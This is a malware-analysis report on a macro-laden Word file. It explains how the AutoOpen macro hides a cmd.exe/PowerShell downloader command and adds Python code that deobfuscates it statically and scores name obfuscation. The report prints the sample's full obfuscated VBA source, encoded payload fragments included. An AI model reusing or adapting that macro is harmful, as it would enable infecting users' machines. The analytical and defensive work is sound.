Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 16ba76a9ae094d40…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 77.9 KB
First seen: 2019-08-04
MD5: 4dd919178d0dd428f6543e1701bbdb76
SHA-1: 06e65427d8cebddb043a8af9397731b81144fa55
SHA-256: 16ba76a9ae094d4094e0b1227f99d595ff514ccfe14c1e0b9f354e35d23032fd
Risk score: 310

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The executing component is the AutoOpen macro, which runs as soon as the document is opened with macros enabled. It obtains a WScript.Shell object through CreateObject and invokes its Run method; these are the OLE_VBA_WSCRIPT and OLE_VBA_CREATEOBJ findings below and they are the actual execution path (the recovered source contains no VBA Shell() call, and no OLE_VBA_SHELL finding appears in the heuristic list). The source is padded with "Error <expression>" statements, dead code whose runtime errors are swallowed by On Error Resume Next, and assembles its command line from dozens of assignments that each glue a handful of short string fragments, spread over five helper functions (JUumPUlXL, JEnupYJwh, ObASoj, nAzzLrMfvdG, LCPiiwCsXW). The leading "C" and the double quote are supplied as ChrW(1 + 0 + 2 + 8 + 56) and Chr(1 + 0 + 4 + 0 + 29) so that neither "CMD" nor a quoted command appears as a literal. Four further names in the Run argument (IfVBtJOR, MHozuTHI, jIhVLDHFYtGT, ifNXDpTZVVw) have no definition in the extracted source and evaluate to Empty, contributing nothing unless they live in a module olevba did not recover. Concatenated, with the "^" escapes removed and case and whitespace normalised, the fragments form: CMD /V:On/C "set s57W=<1062 characters>& for /L %G in (1061,-1,0) do set tKz=!tKz!!s57W:~%G,1!&& if %G LEQ 0 call %tKz:~-1062%". Under delayed expansion the loop copies the stored string into tKz one character at a time from the end backwards, and call re-expands and executes the reversed result. The stored string ends in "e- llehsrewop", so the reversed command begins "powershell -e" followed by base64-alphabet text; this is consistent with a PowerShell stage that downloads and runs a second-stage payload, but that payload is not present in the document. The Run call's second argument, 711730862 - 711730862, evaluates to 0, so the command window is hidden. No exploit artifact was recovered and execution depends on the user enabling macros, so the findings support T1059.005 directly; nothing on this page corroborates the T1203 (Exploitation for Client Execution) tag.
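The following is an added example by the editor, not part of the report, of olevba or of the sample, showing how an analyst can statically recover the command from VBA in this shape without executing anything: it joins " _" line continuations, evaluates the additive Chr()/ChrW() arithmetic, concatenates the per-function string fragments (undefined names read as Empty), strips cmd.exe caret escapes, emulates the for /L reversal loop, and base64-decodes the PowerShell -e argument. The 1,062-character string from the real sample is not reproduced here, so the input is a constructed, shortened macro in the same style whose stored string reverses to "powershell -e" plus a known base64 argument; SAMPLE_VBA, MacroEmulator, analyze and the other names are the example's own, and the evaluator only handles the constructs this sample uses (flat +/- arithmetic inside Chr, string concatenation, and the specific set/for /L/call idiom).

```python
import base64
import re

# Constructed, shortened stand-in for the macros.bas preview on this page (not the sample itself):
# same constructs, but the stored string reverses to a short known command (base64 UTF-16LE "whoami").
SAMPLE_VBA = r'''
Function JUumPUlXL()
On Error Resume Next
RvTnUkpqw = "MD /V" + "^:O" + "n/C " + " " + Chr(1 + 0 + 4 + 0 + 29) + "  ^S"
wFlIwUcHf = "^et ^ ^" + "  ^" + " " + "^s" + "^5" + "7W=A^k" + "G^A^t" + "B^Q^Y"
ChVvMLAw = "A^8" + "G^A^o" + "B^wd" + " ^e-" + " ^l^l^" + "eh^sr^" + "ewo^p& "
JUumPUlXL = RvTnUkpqw + wFlIwUcHf + ChVvMLAw
End Function
Function LCPiiwCsXW()
RufGROVWZE = "f^" + "oR " + " /^L %" + "^G ^" + "IN " + "(^ ^" + " ^2" + "^9" + ",^  ^ ^" + "-1^" + " ^ ^" + ",^ 0 ^" + " )"
sSzKLYcPj = "d^O " + "^sE" + "^t   " + "  ^t^Kz" + "=!" + "^t^Kz!!" + "^s^5" + "7W:" + "~    %" + "^G,   1" + "!&&  ^"
azMal = "i^F  " + "%^G  " + "  L^" + "E^Q  " + "^" + "0 ca^l^" + "L  %" + "^t^Kz" + ":~^ ^ ^" + "-^3" + "^0" + "%" + Chr(1 + 0 + 4 + 0 + 29)
LCPiiwCsXW = RufGROVWZE + sSzKLYcPj + azMal
   Error 95575 / DYJzE
End Function
Sub AutoOpen()
On Error Resume Next
SLVSFXt = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(1 + 0 + 2 + 8 + 56) + IfVBtJOR + JUumPUlXL + LCPiiwCsXW + ifNXDpTZVVw, 711730862 - 711730862)
End Sub
'''

TOKEN_RE = re.compile(r'"([^"]*)"|(ChrW?)\(([^)]*)\)|([A-Za-z_]\w*)')
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
RUN_RE = re.compile(r'\.\s*Run\s*\((.*),\s*([^,]*)\)\s*$')
BLOCK_RE = re.compile(r'^(Function|Sub)\s+(\w+)\(\)\s*$(.*?)^End \1', re.M | re.S)

def eval_int(expr):
    """Flat +/- integer arithmetic: '1 + 0 + 4 + 0 + 29' -> 34, '711730862 - 711730862' -> 0."""
    return sum(int(t) for t in re.findall(r'[-+]?\d+', expr.replace(' ', '')))

class MacroEmulator:
    """Evaluates just enough VBA to recover the string handed to WScript.Shell.Run."""
    def __init__(self, src):
        src = re.sub(r'\s*_\r?\n\s*', ' ', src)                 # join " _" line continuations
        self.blocks = {m.group(2): m.group(3) for m in BLOCK_RE.finditer(src)}
        self.memo, self.run_calls = {}, []                      # run_calls: (command, window_style)

    def concat(self, expr, local):
        parts = []
        for lit, chr_fn, chr_arg, ident in TOKEN_RE.findall(expr):
            if chr_fn:                                          # Chr()/ChrW() hide bytes such as '"' and 'C'
                parts.append(chr(eval_int(chr_arg)))
            else:                                               # literal, local var, other function, else Empty
                parts.append(lit if not ident else local[ident] if ident in local else self.call(ident))
        return ''.join(parts)

    def call(self, name):
        if name not in self.memo:
            self.memo[name] = ''                                # undeclared names (and cycles) read as Empty
            local = {}
            for line in self.blocks.get(name, '').splitlines():
                if m := RUN_RE.search(line):
                    self.run_calls.append((self.concat(m.group(1), local), eval_int(m.group(2))))
                elif m := ASSIGN_RE.match(line):                # "Error a / b" padding lines never match
                    local[m.group(1)] = self.concat(m.group(2), local)
            self.memo[name] = local.get(name, '')               # assigning to the function name sets its result
        return self.memo[name]

def strip_carets(cmd):
    """cmd.exe reads ^x as a literal x, so the carets only defeat naive string matching."""
    return re.sub(r'\^(.)', r'\1', cmd, flags=re.S)

def emulate_reversal(cmd):
    """Emulate: set S=<text>& for /L %G in (N,-1,0) do set A=!A!!S:~%G,1!&& if %G LEQ 0 call %A:~-M%
    Each iteration appends the character of S at offset G, from the end backwards, so A is S reversed."""
    m_set = re.search(r'\bset\s+(\w+)=([^&]*)&', cmd, re.I)
    m_for = re.search(r'\bfor\s+/L\s+%(\w)\s+in\s*\(\s*(-?\d+)\s*,\s*(-?\d+)\s*,\s*(-?\d+)\s*\)', cmd, re.I)
    m_call = re.search(r'\bcall\s+%(\w+):~\s*(-?\d+)%', cmd, re.I)
    if not (m_set and m_for and m_call):
        return None                                             # not the idiom this emulator understands
    acc_name, src_name, var = m_call.group(1), m_set.group(1), m_for.group(1)
    m_body = re.search(rf'\bset\s+{acc_name}=!{acc_name}!!{src_name}:~\s*%{var}\s*,\s*(\d+)!', cmd, re.I)
    start, step, end = (int(x) for x in m_for.group(2, 3, 4))
    acc, width = '', int(m_body.group(1)) if m_body else 1
    for g in range(start, end + (1 if step > 0 else -1), step):   # for /L bounds are inclusive
        acc += m_set.group(2)[g:g + width]                          # !S:~%G,1! = the character at offset G
    return acc[int(m_call.group(2)):]                               # call %A:~-M% runs the last M characters

def decode_encoded_command(cmd):
    """powershell -e / -EncodedCommand takes base64 of the UTF-16LE script text."""
    m = re.search(r'powershell(?:\.exe)?\s+-e\w*\s+([A-Za-z0-9+/=]+)', cmd, re.I)
    return base64.b64decode(m.group(1)).decode('utf-16-le') if m else None

def analyze(src):
    em = MacroEmulator(src)
    em.call('AutoOpen')
    raw, window_style = em.run_calls[0]                         # window_style 0 = SW_HIDE, no visible window
    plain = strip_carets(raw)
    inner = emulate_reversal(plain)
    return {'window_style': window_style, 'cmd_line': plain, 'reversed': inner,
            'decoded': decode_encoded_command(inner) if inner else None}
```

analyze(SAMPLE_VBA) yields the hidden-window flag, the de-careted cmd.exe line, the reversed "powershell -e ..." command and the decoded script text. Fed the full macros.bas, the same three layers come out, with the PowerShell stage as the last one; nothing in the pipeline is executed, every step is a string transformation, which is the point of doing this statically rather than in a sandbox.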

Heuristics (10)

  • ClamAV: Doc.Malware.Generic-6668129-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6668129-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
       Error 82430 / jZwzi / 82867 * iLwsqS
    SLVSFXt = CreateObject("WScript.Shell") _
    . _
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       Error 82430 / jZwzi / 82867 * iLwsqS
    SLVSFXt = CreateObject("WScript.Shell") _
    . _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "mpYijqLwRj"
    Sub AutoOpen()
    On Error Resume Next
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The heuristic's description assumes that no modern VBA project was recovered and no stronger macro-virus family marker was present; on this sample a VBA project was in fact recovered (OLE_VBA_MACROS and the extracted macros.bas below), so this firing is redundant with OLE_VBA_AUTOOPEN rather than independent evidence. It indicates old Word macro execution surface only and is not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard OOXML DrawingML namespace URI present in ordinary Office files; it is not an indicator and is not referenced by the recovered macro code.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10927 bytes
SHA-256: 0f3dc9bb43f05af224845bc7ebd02f22fbd68a1518174291edf3d94dfab678f7
Detection (ClamAV): No threats found
Obfuscation or payload: likely
148 of 240 identifiers look randomly generated (e.g. 'dwcNZCjjdtaSa'); 3 string-concatenation chain(s), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "dwcNZCjjdtaSa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MjMiMjXLHS"
Function JUumPUlXL()
On Error Resume Next
Error UrrDWq * awfJb * EEWHY / azikIY
   Error rpthQc / YDVrr
RvTnUkpqw = "MD /V" + "^:O" + "n/C " + " " + " " + Chr(1 + 0 + 4 + 0 + 29) + "  ^S"
Error HSIvV * 27348
   Error wswzf * BQjiU / 48649 / RzdYaw
   Error Ozohi * HjidCI
wFlIwUcHf = "^et ^ ^" + "  ^" + " " + "^s" + "^5" + "7W=A^A" + "C^A^g^" + "A^A^IA"
Error 70425 * vpmwmM * wzmFU * wXisO
   Error KMJLp * BEcJLX / 25785 / DIsEO
ChVvMLAw = "^A" + "C" + "^" + "AgA^A" + "IA^AC" + "^A^g" + "^AAIA" + "AC^A" + "g^A^" + "AIA^A" + "C"
Error XnVzjh / 1836
   Error 38139 * kDzrt
   Error hHzsPq / 76287 * 98655 * zfoWqs
   Error cQzLr / IkMnq * plATMk * luJlO
   Error LfTQj / bGDLKW
AvdfVwn = "A^gAA^" + "IA" + "A" + "CA^g^" + "AQf^A0" + "HA7" + "B^AaAM" + "G" + "A0B" + "^QYAMG" + "A^9" + "BwO" + "^A^sG^A"
Error lkapN * 99200 * 45894 * ZpnDtW
GSPzOPKc = "^h^B^" + "QZ^A" + "I^HA^i" + "B^w^OA8" + "G^A^" + "m^Bgc^A" + "^QCA"
Error CPiRk / nHaOZS
   Error rAiLo * pBAni
   Error 55695 * RzadYj
   Error 71956 / 96558 / 38634 * FfEtzC
   Error 68818 / zzXAl
qslmPuilR = "^gA^Qb^" + "A^" + "UG" + "^A0" + "BQ^S" + "A0CA" + "l^B^w" + "^aA8" + "GA" + "^" + "2^BgbAk" + "E^"
Error iNSJG / azziS / XTmKVA / PpzSfh
   Error cjPoci / JzXstY
olNSo = "A7^AQ^" + "KA^" + "8^G" + "^AmB" + "gcAQC^A" + "^gAAL^" + "Ak" + "^F^AvB"
Error QBwiLR / dCZojf / ncjVwS / 67848
   Error 80646 / lJnnd
aDwvOGvzwq = "Q^SA" + "QC^A^" + "oAQ" + "^Z^A^wG" + "^A^pB^" + "gRAQGA"
Error CMCdk / hLzlmC
   Error 66094 * fRHsj / 64656 / lrDIW
   Error BdvAvz * jSrJrt * nVzGmi * fiDMwW
   Error iEjQK / IUDXL
lJDssGCIbk = "^h" + "B^wb^Aw" + "^G" + "AuBwdA" + "^8^GA^" + "EB^gLA^" + "I^GA^" + "0"
Error 11879 * 57988 * 68207 * OsIdK
   Error zsabY / BipPJ / ftCpd * DZPzT
   Error BGFTMO * VLSVdo
   Error YQQVwF / YzPWu * 85811 * wdhwIL
aOBwVU = "Bw" + "SAQC" + "A" + "^7^BQ" + "^" + "e^A"
JUumPUlXL = RvTnUkpqw + wFlIwUcHf + ChVvMLAw + AvdfVwn + GSPzOPKc + qslmPuilR + olNSo + aDwvOGvzwq + lJDssGCIbk + aOBwVU
   Error 95575 / DYJzE
   Error rMwUi / jjQoEU * DaoKt * wwwqFR
   Error vwQwO / 8269 / 20672 * DiZGN
   Error 28557 * zzbYw / 36593 * OVJum
End Function
Function JEnupYJwh()
On Error Resume Next
Error SjjiWv / SJYwW / kwFTmQ * WrDNla
   Error 10575 / dPQMl
SDbJZwBI = "^I^HA" + "^0" + "B^w^e^A" + "kC^" + "Av^BQT" + "^A" + "^oGAk" + "A^AI^" + "A4G"
Error wsUYb / iJzaUj
   Error oHPdp / aNGZB
nUCfhwz = "^ApB^A^" + "IA^kF^A" + "v" + "BQS" + "A" + "^" + "QC" + "^A^o^A" + "A^" + "aA^M^" + "GAh^B"
Error hsnNY / MMPCwu
   Error 62685 / swiUt
dhWIDUzD = "^Q^" + "Z^AIH" + "^A" + "v^B" + "^g^" + "Z" + "A^sD" + "^AnA^"
Error 94245 * vuuNdT / 40655 * bbmjoY
   Error wbJPq * 64109
PEuXmr = "QZ" + "^A^g^H" + "^A^l" + "^B" + "g^L^A" + "cCArA^A" + "R" + "^A" + "IGA^i^"
Error UTjGjK * CwGTq / 35533 / PYUhf
   Error 61376 * GLiijm * 91942 / Siwzj
   Error 70168 * EiPjV
WaFUHVW = "B" + "A" + "^JA^s" + "CA" + "n^A^" + "AXAcC" + "^A" + "rA^wYAk" + "^GAs^"
Error 101 * tJATYb * 10110 * dCWoS
   Error 44989 * 49130
   Error vdwDF / SDkXUW * Fwhzaf / ojVSC
   Error zrAkcF * SkiHzu / 24935 * UzmCIj
pGttoVFBWc = "BgY^A" + "^UH^" + "A" + "^wBg^OA" + "^Y^H^A" + "^uBQ^Z" + "A" + "^QC" + "A^9^Aw^" + "b"
Error pEvEq * 4759
   Error OCEFiB / bMIjB * 36624 / jKaXAz
LJYQHH = "^" + "AYG^" + "A" + "^y^B^A" + "J^As^"
Error sLslfo * 9114 / SVztw / BDKiRz
wiGDcBBh = "D^AnAQN" + "^AA^" + "DAx^" + "Aw^J" + "^AAC^" + "A9AA" + "^I^A" + "QE^Ai^B" + "g^Y^A^" + "QC^A" + "7^AQ^K" + "A" + "cC^A^A^"
Error cONAKd / 21190
qzCVKFChqA = "Bw^J" + "^A^gCA" + "^0BQa^A" + "^" + "wGAw" + "B^w^U" + "A^4C" + "An^A^Qb" + "^A^M^" + "H^" + "Ak^Bg^Y" + "^A^gE" + "^A"
Error 37594 / OtSSQW
   Error asEVVF * 65744 * 53441 * HqGtA
   Error 550 / 24451
TtKjFOW = "v^" + "AwcA^Q^" + "G" + "^A" + "hB" + "^wbA^w^" + "GAw" + "B" + "Q^" + "d" + "^" + "A^8CA^" + "0^B"
Error XKVli * 51672
   Error oHVlsm / LdSiv / wrRLHW * QcfhRl
JLnltD = "^g" + "^b" + "AUG^A" + "^0" + "^Bg" + "^" + "bA^8G" + "^"
Error HSnoT * 92825 / 87131 / AjQKi
   Error 33742 / jFSsQw * 43871 * WFGpow
   Error 12772 * OEzhXN / BnwbAE * wtiLb
kSROHDFCF = "AjBQ^L^" + "AA" + "H" + "A3BwLAU" + "^G^A0B^" + "QaA" + "MHA" + "i^BQ^" + "ZAc" + "HA" + "vA^Q" + "^bA8G^" + "Aj^"
JEnupYJwh = SDbJZwBI + nUCfhwz + dhWIDUzD + PEuXmr + WaFUHVW + pGttoVFBWc + LJYQHH + wiGDcBBh + qzCVKFChqA + TtKjFOW + JLnltD + kSROHDFCF
   Error omPKqZ / iwvGJ * CJvtSN * 79847
   Error MGmJs * 8670
End Function
Function ObASoj()
On Error Resume Next
Error fkKsBz / 80200
   Error zqPaq * rPiotz
   Error bRsSm * nqABwc / 22641 * 13179
jzPJksJW = "B^" + "gL^A" + "^Q^D^Av" + "^Bgc^" + "A^A" + "^HAl^B" + "gc^A8C" + "^Av^Ag^" + "O^" + "AA^H^" + "A^0BAd" + "^A"
Error 98525 / FGHwa / 94673 / KliEtj
qLRizBfD = "g^" + "G^AA" + "^BA" + "^W^" + "A^M" + "DAvA^Q" + "bA^8GAj" + "^"
Error Liwri / jABFo / WzjjK / czuJl
   Error 92423 / tNUWUD / DizFm * zXnoSa
   Error 53929 * HopXP / 19403 * FMdSqi
QJSlJt = "B" + "^gL" + "A^w^G^" + "A^pB^wc" + "A^" + "EG" + "Ay^B^" + "g" + "^Y^" + "A8G^Ak"
Error cwIZG / GBzGv
NhNvnC = "^B^gY^" + "A^IH^" + "Ah^BQb^" + "A^8CAvA" + "g" + "^O^A^" + "A^H^A^" + "0BAd^" + "A" + "^g^" + "GA^A^Bg" + "c^" + "A^s^G"
Error 40740 / wAUHoT * Qzsszw / 24296
   Error 92730 / zwqsTB / JhoFk * qWkBbv
   Error frBYsl / QpoIX
   Error 74862 / hfKazL / 70545 * ostuAc
   Error jiklw * PmaXX / bGVSPt / lkXNvz
tihwjXP = "^Ar^" + "B^" + "QOAYHA" + "^2^BAb" + "^A^kDAv" + "A"
Error WwjZq * obZoEv
   Error AtdRXI / NOzuLu / 10707 * iOLWK
   Error 90433 * WRVAU / QNfzqJ / wTRbhS
   Error 59639 * AEoKa
   Error LjJBSs * rjirFZ
   Error 60973 * dkaKLh * wBBpW * QzDOZP
hCnlbWjFqz = "gc^" + "A" + "^Y^G" + "^A^u^" + "Awc^A^" + "E^" + "GAr^B^" + "Qd^A^w" + "G^AuA^Q" + "^MA"
Error jhVVcN / wJbXbd
   Error QlGcr * snYbln / 9036 * KELtYz
   Error dOjVXz / MrTFtk
   Error ViCWU * zcPhUF * PWsLq * WRDcq
   Error MqHYBY / WVfEa * JPdRk * iisdq
TwQIwWqw = "A" + "^H" + "A3^Bw" + "LA^8C" + "A^6^" + "A^AcAQH" + "A0" + "^BA" + "aA" + "AEA"
Error 39013 / CUMQd
mQfUavVbEI = "2A^wc" + "A8C^A" + "t^B^wb" + "A^M^G" + "^AuA^" + "Q" + "YA^kH^A" + "^h^Bg" + "^Y" + "AE^G^" + "AyBQ" + "^dA" + "^M^H^"
Error 54931 / wKGbo * hIMLAL * jnXYjS
vlYHwQij = "A" + "w^B^w^b" + "AQ^H^A" + "h^B" + "gcAE^GA" + "^j" + "B^QYA" + "c^"
Error cJuhbz / EQnZt
   Error LiiavU / 7706 / 53887 * MtYMf
zTORLz = "G^A^u^" + "B^QZ^A" + "^A" + "^" + "H^" + "Au" + "^A^g^" + "bA" + "E^G^A" + "p^BQ^Y^"
ObASoj = jzPJksJW + qLRizBfD + QJSlJt + NhNvnC + tihwjXP + hCnlbWjFqz + TwQIwWqw + mQfUavVbEI + vlYHwQij + zTORLz
   Error 15156 / HOKdJI
   Error 71735 * IQzctO / NEkmnR * UHKdG
   Error WGbTQ / jkBNLh
   Error KjnCSS * bLcSdJ / SQFpRt / 26046
End Function
Function nAzzLrMfvdG()
On Error Resume Next
Error QDdqG * dcuvwA
   Error 96827 * Yaabsz
   Error vSlIVP / 68620
   Error zLliH / kbLRmZ
   Error ToEusH * Sfrct / 63967 / ZwzoQS
qMMwjAdXHI = "AI^" + "H^A^" + "l^B^" + "w^Y" + "^AI^H" + "^A" + "^l^B^A"
Error vlUud * IKtOi * 21886 / VaSKt
HjDQGQfG = "c" + "AE^G^A" + "^yB" + "Q" + "^YA^" + "M^"
Error INzJhD * KGHiYw
jvQUAZSu = "G^AhB^w" + "Z^A4^" + "G^A^" + "lB^Ac" + "^A8C^" + "Av^Ag" + "OAA^" + "HA" + "^"
Error kwbfF / InXUl * PcAnGA / MRXWnl
   Error 92141 * 45743 * 14904 * oArPdf
BFNOsJdr = "0B^A" + "^d" + "^A^gGA" + "A^B^wRA" + "A^F^" + "AiB^w" + "c^A"
Error 61237 / mMiMAE
   Error 85673 / zWiGz / 92485 * icYOn
pYPaqEzU = "s^G^A^" + "G^B" + "^Q^b" + "A^I^H" + "Av^AQ" + "Z" + "A^sG^Au" + "^A" + "w^b^AM" + "^G" + "Au^A" + "wcA^Q"
Error 48037 / rwAZf
   Error OoMbou * 90063 / QWZwG / SjoIib
   Error 84677 / 24502 / 78626 * msJjjq
   Error 57885 / XuGcj * 46891 / jLviC
mRnjIWh = "^H^A^uB" + "^QdA" + "8G^" + "A" + "t^B" + "^g^Y" + "AU" + "^G^" + "A^3B^" + "wLA8C" + "A6AAc^A"
nAzzLrMfvdG = qMMwjAdXHI + HjDQGQfG + jvQUAZSu + BFNOsJdr + pYPaqEzU + mRnjIWh
   Error FRwzQB * lTUAS * 19075 * 62052
   Error UfnUPR / JkGUv
End Function
Function LCPiiwCsXW()
On Error Resume Next
Error 22223 / 55168 * jGihF / nhjMT
   Error RDWODC / OpzlV
   Error 94097 * rsaQC
   Error 74461 / 66531
GFsFajN = "Q^HA0" + "B" + "^Aa^Ac" + "CA^" + "9" + "A^w" + "bA0E" + "A^q^BA" + "^J^AsD" + "A" + "0B^g^"
Error 70280 * Poirj * RiHsvF / 17149
   Error 35307 * zfodw / JfqQt / bUsAnz
   Error ibBUQz * YOaZm
   Error AFOwW / 53973 * 73179 / TOKwi
MkSwaJAG = "b^A^UG^" + "ApBA^b^" + "AM^E^" + "A^iBQZ^" + "AcF^" + "Au^A^A" + "^dAU^G" + "^A^" + "O^BAIAQ" + "HA^" + "j" + "BQ^Z^A^" + "oGA"
Error HFirlw * KIkGw
   Error IOozu / FfHSHw
   Error iNmdb * dZzjB * nwZUHS * 94150
   Error SBzWr / GthsFo / Sfjid / oWHDl
YatkbnMcwGj = "^i^B^" + "wb" + "A" + "0CA3" + "^BQ" + "ZA^"
Error OhiXrE * zOirLM / iYHLI / MzrlEj
   Error 55156 / Yqmzb * 5952 * bFdatv
iqDwwc = "4^G" + "^A^9A" + "^" + "g^Y" + "A^Q^H^A" + "L^BA" + "^J^ ^e-"
Error tkKqtY / ksSCW / Thnbl / ptSHr
   Error 32502 * MjzUt
   Error zWHNrf / zObws
RufGROVWZE = " ^l^l^" + "eh^sr^" + "ewo^p& " + "f^" + "oR " + " /^L %" + "^G ^"
Error 50634 * SCMasd * aXDHEG / iRoMsF
   Error AMRKXL / iwWjiZ
   Error RVArKr / 16933
zVzvBSwQj = "IN " + "(^ ^" + " ^ " + " ^10" + "^61" + ",^  ^ ^" + "-1^" + " ^ ^" + "  ^"
Error 66770 * mTEsYH / 76681 / qNoUm
   Error 32946 / wfqHAj
   Error 71267 * 82851 / BSmRW / qQIJr
sSzKLYcPj = ",^ 0 ^" + "  ^ )" + "d^O " + "  " + "^sE" + "^t   " + "  ^t^Kz" + "=!" + "^t^Kz!!"
Error QzwHCk * znrnZ / jPiaM / NzwQlt
   Error UXzuzR * SDDrK / cTLtFQ * iFwZQJ
huNcjHHpdDr = "^s^5" + "7W:" + "~    %" + "^G,   1" + "!&&  ^" + "i^F  " + "%^G  " + "  L^" + "E^Q  "
Error 42215 / CRqIw / NzDjAi / hKOqp
   Error aZinD / BFHjHv
azMal = "^" + "0 ca^l^" + "L  %" + "^t^Kz" + ":~^ ^ ^" + "-^1" + "^06" + "2%     " + " " + "  " + Chr(1 + 0 + 4 + 0 + 29) + "   "
LCPiiwCsXW = GFsFajN + MkSwaJAG + YatkbnMcwGj + iqDwwc + RufGROVWZE + zVzvBSwQj + sSzKLYcPj + huNcjHHpdDr + azMal
   Error 71595 * 57924
   Error aaHCC * 65385
   Error 95241 * CvTqLm * 88853 / JmntTi
   Error NAWlh / brEiE / 52961 / OTCDv
   Error VRFFzK / 78098 * TXRjm * 15562
End Function


Attribute VB_Name = "mpYijqLwRj"
Sub AutoOpen()
On Error Resume Next
   Error 50877 * 69896
   Error 80640 * 76323
   Error 82430 / jZwzi / 82867 * iLwsqS
SLVSFXt = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(1 + 0 + 2 + 8 + 56) + IfVBtJOR + MHozuTHI + JUumPUlXL + JEnupYJwh + ObASoj + nAzzLrMfvdG + LCPiiwCsXW + jIhVLDHFYtGT + ifNXDpTZVVw, 711730862 - 711730862)
   Error BItcCs * JRPFk * 8988 / NKnLXW
   Error 85878 / 36976
   Error 33721 * 64194 / LaCWB * hOhOnK
   Error qYWif * Qczzz
End Sub
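The artifact record above states that 148 of 240 identifiers look randomly generated and counts string-concatenation chains. The following is an added example by the editor, not the report's own scoring logic and not an oletools routine, showing one way such a triage check can be implemented over VBA source: it collects module, procedure and variable names, scores each on upper/lower case flips, longest consonant run and vowel count, and counts assignments that splice three or more string literals with "+". The thresholds and the "likely" rule are the editor's assumptions; the input is a constructed fragment that reuses a few generated names from the preview alongside ordinary ones, and SAMPLE_MODULE, looks_random and triage are the example's own names.

```python
import re

# Constructed VBA fragment in the style of the extracted macros.bas (not the sample itself): generated
# names taken from the preview above mixed with ordinary names an author would choose.
SAMPLE_MODULE = r'''
Attribute VB_Name = "dwcNZCjjdtaSa"
Attribute VB_Name = "MjMiMjXLHS"
Function JUumPUlXL()
On Error Resume Next
RvTnUkpqw = "MD /V" + "^:O" + "n/C "
wFlIwUcHf = "^et ^ ^" + "  ^" + "^s"
JUumPUlXL = RvTnUkpqw + wFlIwUcHf
End Function
Attribute VB_Name = "mpYijqLwRj"
Sub AutoOpen()
SLVSFXt = CreateObject("WScript.Shell")
End Sub
Attribute VB_Name = "ThisDocument"
Sub Document_Open()
tempPath = Environ("TEMP")
End Sub
'''

NAME_RES = [re.compile(p, re.M) for p in (
    r'^Attribute VB_Name = "(\w+)"',          # module names
    r'^\s*(?:Function|Sub)\s+(\w+)',          # procedure names
    r'^\s*([A-Za-z_]\w*)\s*=',                # assignment targets (Attribute lines do not match)
)]
STRING_LIT = re.compile(r'"[^"]*"')


def looks_random(name):
    """Editor's heuristic (thresholds are assumptions, not the report's): machine-generated names show
    many upper/lower case flips, long consonant runs, or no vowels at all; real identifiers rarely do."""
    letters = ''.join(c for c in name if c.isalpha())
    case_runs = 1 + sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    vowels = sum(c in 'aeiou' for c in letters.lower())
    longest_consonants = max((len(r) for r in re.findall(r'[^aeiou]+', letters.lower())), default=0)
    return case_runs >= 5 or longest_consonants >= 5 or (vowels == 0 and len(letters) >= 5)


def concat_chains(src):
    """Assignments that glue three or more string literals with '+', the fragmenting idiom in this sample."""
    return sum(1 for line in src.splitlines()
               if '=' in line and '+' in line and len(STRING_LIT.findall(line.split('=', 1)[1])) >= 3)


def triage(src):
    names = {n for rx in NAME_RES for n in rx.findall(src)}
    flagged = sorted(n for n in names if looks_random(n))
    chains = concat_chains(src)
    return {'identifiers': len(names), 'random_looking': len(flagged), 'examples': flagged[:3],
            'concat_chains': chains,
            # Verdict rule is the editor's: more than half the names look generated and a chain exists.
            'obfuscation': 'likely' if len(flagged) > len(names) / 2 and chains else 'unlikely'}
```

triage(SAMPLE_MODULE) flags the seven generated names and leaves AutoOpen, ThisDocument, Document_Open and tempPath alone; "WScript" also passes, which is why the vowel rule is gated on having no vowels rather than on a low ratio. A score like this is a triage signal to prioritise samples, not a detection on its own, since the same fragmenting and name mangling is produced by some legitimate VBA obfuscators.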